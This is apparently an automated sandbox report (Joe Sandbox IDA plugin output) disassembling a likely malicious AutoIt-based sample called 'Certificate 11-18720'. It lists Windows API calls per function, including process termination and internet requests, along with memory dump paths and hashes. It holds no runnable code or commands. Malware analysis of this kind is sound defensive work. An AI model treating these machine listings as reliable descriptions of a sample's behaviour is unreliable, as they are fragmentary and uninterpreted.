                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 005E7F9E
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 005E7FB1
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 005E7FC4
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 005E7FD7
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 005E7FEA
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 005E7FFD
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 005E8010
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 005E8023
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 005E8036
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 005E8049
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 005E805C
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 005E806F
                                                                                    • __mtinitlocks.LIBCMT ref: 005E7B4C
                                                                                      • Part of subcall function 005E7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0067AC68,00000FA0,?,?,005E7B51,005E5E77,00676C70,00000014), ref: 005E7E41
                                                                                    • __mtterm.LIBCMT ref: 005E7B55
                                                                                      • Part of subcall function 005E7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,005E7B5A,005E5E77,00676C70,00000014), ref: 005E7D3F
                                                                                      • Part of subcall function 005E7BBD: _free.LIBCMT ref: 005E7D46
                                                                                      • Part of subcall function 005E7BBD: DeleteCriticalSection.KERNEL32(0067AC68,?,?,005E7B5A,005E5E77,00676C70,00000014), ref: 005E7D68
                                                                                    • __calloc_crt.LIBCMT ref: 005E7B7A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005E7BA3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                    • String ID:
                                                                                    • API String ID: 2942034483-0
                                                                                    • Opcode ID: 4dd78aaf7b923d6453c841dce917081b276481c8f3085a99054dd33848caee3c
                                                                                    • Instruction ID: 6bcaf253484cc6c2dd7dd884d3777823c9c220f53c104a9ccc531202e6d11e0d
                                                                                    • Opcode Fuzzy Hash: 4dd78aaf7b923d6453c841dce917081b276481c8f3085a99054dd33848caee3c
                                                                                    • Instruction Fuzzy Hash: 32F0963251D7DB19E72C77777C0AA4B2E8ABF89730B204699F8E4C50D2FF2088424165
                                                                                    APIs
                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 005C281D
                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 005C2825
                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 005C2830
                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 005C283B
                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 005C2843
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 005C284B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual
                                                                                    • String ID:
                                                                                    • API String ID: 4278518827-0
                                                                                    • Opcode ID: c6e4d42f1bfe56129ea72a423158b6972c0e6601152d4b732bb2c37d86d24d8b
                                                                                    • Instruction ID: 383060b496e81a50821e8f24b9c99c458e58018bbd2bbb09adb8ad167b248c36
                                                                                    • Opcode Fuzzy Hash: c6e4d42f1bfe56129ea72a423158b6972c0e6601152d4b732bb2c37d86d24d8b
                                                                                    • Instruction Fuzzy Hash: 790167B0902B5ABDE3009F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 1423608774-0
                                                                                    • Opcode ID: 9b9d0a7b3d9e8b4a1e0b03e220e07471159d75f88545be21c4d9bd0c16f70452
                                                                                    • Instruction ID: f242e522a7b7af5db9590d6f3ba93862178c06b5e97b7896f19ecd13f9281c5c
                                                                                    • Opcode Fuzzy Hash: 9b9d0a7b3d9e8b4a1e0b03e220e07471159d75f88545be21c4d9bd0c16f70452
                                                                                    • Instruction Fuzzy Hash: B601A436782211ABD7191B58EC58DEB77ABFF8A701B041529F603921E5DBB49D00DB60
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00607C07
                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00607C1D
                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00607C2C
                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00607C3B
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00607C45
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00607C4C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 839392675-0
                                                                                    • Opcode ID: e84d8d036ab3748f8d03496522df2614da34309de13ca07105d16f553ad6bd5f
                                                                                    • Instruction ID: 1cdef8993de4c13fcb30ff3c1a76dab19e7a00a1c1abaefd22210863f41cf792
                                                                                    • Opcode Fuzzy Hash: e84d8d036ab3748f8d03496522df2614da34309de13ca07105d16f553ad6bd5f
                                                                                    • Instruction Fuzzy Hash: 11F03A7AA42158BBE7215B52AC0EEEF7B7DEFC7B11F000018FA0591191D7A06A41C6B5
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00609A33
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,00635DEE,?,?,?,?,?,005CED63), ref: 00609A44
                                                                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,00635DEE,?,?,?,?,?,005CED63), ref: 00609A51
                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00635DEE,?,?,?,?,?,005CED63), ref: 00609A5E
                                                                                      • Part of subcall function 006093D1: CloseHandle.KERNEL32(?,?,00609A6B,?,?,?,00635DEE,?,?,?,?,?,005CED63), ref: 006093DB
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00609A71
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,00635DEE,?,?,?,?,?,005CED63), ref: 00609A78
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 3495660284-0
                                                                                    • Opcode ID: 5346bfbd38b0db59d33d8ca9e7f7a311bd8127c320bd053f6f2c635aeb5fe979
                                                                                    • Instruction ID: 775da41a9018ba4ffa303f9345e44723b470442a63a401bb889ba2139c2e24d2
                                                                                    • Opcode Fuzzy Hash: 5346bfbd38b0db59d33d8ca9e7f7a311bd8127c320bd053f6f2c635aeb5fe979
                                                                                    • Instruction Fuzzy Hash: FFF0E23AA81201ABD3151FA4EC8CDEF777BFF86301B042025F203910E9CBB59A00DB60
                                                                                    APIs
                                                                                      • Part of subcall function 005DF4EA: std::exception::exception.LIBCMT ref: 005DF51E
                                                                                      • Part of subcall function 005DF4EA: __CxxThrowException@8.LIBCMT ref: 005DF533
                                                                                    • __swprintf.LIBCMT ref: 005C1EA6
                                                                                    Strings
                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 005C1D49
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                    • API String ID: 2125237772-557222456
                                                                                    • Opcode ID: b89907728814ec826e56befe00fa2ffa6b5027b1b8971a3aff6360af4e4414ca
                                                                                    • Instruction ID: f4b00c65c7feaa5acd47c20db496f482128f313c65823f3fe22da25775eb2f0e
                                                                                    • Opcode Fuzzy Hash: b89907728814ec826e56befe00fa2ffa6b5027b1b8971a3aff6360af4e4414ca
                                                                                    • Instruction Fuzzy Hash: B2916B715042029FC724EFA4C899E6ABFE9BF85710F04491DF885A72A2DB70ED05CB92
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 0061B006
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 0061B115
                                                                                    • VariantClear.OLEAUT32(?), ref: 0061B298
                                                                                      • Part of subcall function 00609DC5: VariantInit.OLEAUT32(00000000), ref: 00609E05
                                                                                      • Part of subcall function 00609DC5: VariantCopy.OLEAUT32(?,?), ref: 00609E0E
                                                                                      • Part of subcall function 00609DC5: VariantClear.OLEAUT32(?), ref: 00609E1A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                    • API String ID: 4237274167-1221869570
                                                                                    • Opcode ID: 6a13a399f4fb367961d9063f24db1b698bb691ec5fe43a7b252cf0e031398c2c
                                                                                    • Instruction ID: aa36d5a35e41ccde4616e67da00b7555588817ea549965b7e7f1974802c1f17f
                                                                                    • Opcode Fuzzy Hash: 6a13a399f4fb367961d9063f24db1b698bb691ec5fe43a7b252cf0e031398c2c
                                                                                    • Instruction Fuzzy Hash: A7917C706043429FCB10DF64C485AAABBE5BFC9704F08586DF88A8B361DB31E945CB52
                                                                                    APIs
                                                                                      • Part of subcall function 005DC6F4: _wcscpy.LIBCMT ref: 005DC717
                                                                                    • _memset.LIBCMT ref: 00605438
                                                                                    • GetMenuItemInfoW.USER32(?), ref: 00605467
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00605513
                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0060553D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                    • String ID: 0
                                                                                    • API String ID: 4152858687-4108050209
                                                                                    • Opcode ID: 5dea20b7dccfee6fce7167f35bcb4560ab24ce3d0ebb638bbf4c003ea9f748a1
                                                                                    • Instruction ID: 883f721c577c98c1ae6d8953428906cf6ce4bc3d2f4035d3e2609a237a551940
                                                                                    • Opcode Fuzzy Hash: 5dea20b7dccfee6fce7167f35bcb4560ab24ce3d0ebb638bbf4c003ea9f748a1
                                                                                    • Instruction Fuzzy Hash: B25101715447019BD71D9B28CC45AEBBBEAEB85314F040A2EF897D32D0EBA0CD458F52
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0060027B
                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006002B1
                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006002C2
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00600344
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                    • String ID: DllGetClassObject
                                                                                    • API String ID: 753597075-1075368562
                                                                                    • Opcode ID: 7922b2ef19dffcc71adf657c2cb250644d6d7c1284dc5fe345675052c3a74766
                                                                                    • Instruction ID: 09eaf3caf065432fc41956954b33846047511ed8c784729e336b68b5687dc9d2
                                                                                    • Opcode Fuzzy Hash: 7922b2ef19dffcc71adf657c2cb250644d6d7c1284dc5fe345675052c3a74766
                                                                                    • Instruction Fuzzy Hash: 72414D71640205EFEB0ACF54C884B9B7BBAEF45315F1480A9ED099F286D7B1DA44CBA0
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00605075
                                                                                    • GetMenuItemInfoW.USER32 ref: 00605091
                                                                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 006050D7
                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00681708,00000000), ref: 00605120
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1173514356-4108050209
                                                                                    • Opcode ID: be5fcc1989c024dd23a8f7e5ad0f4bee57fc259e90be02dfb886dcfd304c7240
                                                                                    • Instruction ID: 9b6b0b835b85a92fb4a4c29e660d2baa6643e2e9d0abe0b7cd47c3ab4829a9c6
                                                                                    • Opcode Fuzzy Hash: be5fcc1989c024dd23a8f7e5ad0f4bee57fc259e90be02dfb886dcfd304c7240
                                                                                    • Instruction Fuzzy Hash: 1841DE302457019FD7289F24D884B6BBBEAAF85318F044A5EF8A6873C1D730A800CF66
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 00620587
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharLower
                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                    • API String ID: 2358735015-567219261
                                                                                    • Opcode ID: 531a169856ac6b5a88e0b14f2766934ffc7482c5d5672354c4842e51a9870b92
                                                                                    • Instruction ID: 1e1e69bffddc4619abdb1a13cdc77e19ced27afe3962cb8cdea8877e1a58215d
                                                                                    • Opcode Fuzzy Hash: 531a169856ac6b5a88e0b14f2766934ffc7482c5d5672354c4842e51a9870b92
                                                                                    • Instruction Fuzzy Hash: 4E31D630500516AFDF10EF94D845AEEBBB6FF85314B10862AE425A77D1DB71E905CF40
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 005FB88E
                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 005FB8A1
                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 005FB8D1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: 0e42ab583775d03754e29913aa45fc341a9f60adba7e6cba00e9410735cfc2cd
                                                                                    • Instruction ID: 42bfadb495b5a78ab8c384d0282461c0d1795204f575d871ba75863865ef1607
                                                                                    • Opcode Fuzzy Hash: 0e42ab583775d03754e29913aa45fc341a9f60adba7e6cba00e9410735cfc2cd
                                                                                    • Instruction Fuzzy Hash: 8621D276A00109FEEB14ABA4D88ADBE7F7DBF86390F104129F115A61E1DB684D069760
                                                                                    APIs
                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00614401
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00614427
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00614457
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0061449E
                                                                                      • Part of subcall function 00615052: GetLastError.KERNEL32(?,?,006143CC,00000000,00000000,00000001), ref: 00615067
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                    • String ID:
                                                                                    • API String ID: 1951874230-3916222277
                                                                                    • Opcode ID: a6f1c4e204878058e9a5a4a2fdbfb7348cb0e030894078fd73d01b9a77678f88
                                                                                    • Instruction ID: 4c75a10fa18cd3e1ac47003fc3974abb3e34faaf041e6b7d8bf2415fa22c450c
                                                                                    • Opcode Fuzzy Hash: a6f1c4e204878058e9a5a4a2fdbfb7348cb0e030894078fd73d01b9a77678f88
                                                                                    • Instruction Fuzzy Hash: 612180B5500208BEE7119F94CC85EFFB6EEEB49758F14901AF10597240DE649D4597B0
                                                                                    APIs
                                                                                      • Part of subcall function 005DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005DD1BA
                                                                                      • Part of subcall function 005DD17C: GetStockObject.GDI32(00000011), ref: 005DD1CE
                                                                                      • Part of subcall function 005DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 005DD1D8
                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0062915C
                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00629163
                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00629178
                                                                                    • DestroyWindow.USER32(?), ref: 00629180
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                    • String ID: SysAnimate32
                                                                                    • API String ID: 4146253029-1011021900
                                                                                    • Opcode ID: 4eb8289394ac32b9b4fe161d69c23adea927ee6e613c9a4d3161b3ced1185381
                                                                                    • Instruction ID: b72904f3b502f6e8d5932da4d3b835b0bd3001d669d78488b8248655828bc19c
                                                                                    • Opcode Fuzzy Hash: 4eb8289394ac32b9b4fe161d69c23adea927ee6e613c9a4d3161b3ced1185381
                                                                                    • Instruction Fuzzy Hash: 6C219271600616BBEF104E65EC89EFA37AEFFD63A4F100619F95492290C731DC62AB70
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00609588
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006095B9
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 006095CB
                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00609605
                                                                                    Strings
                                                                                    Memory Dump Source
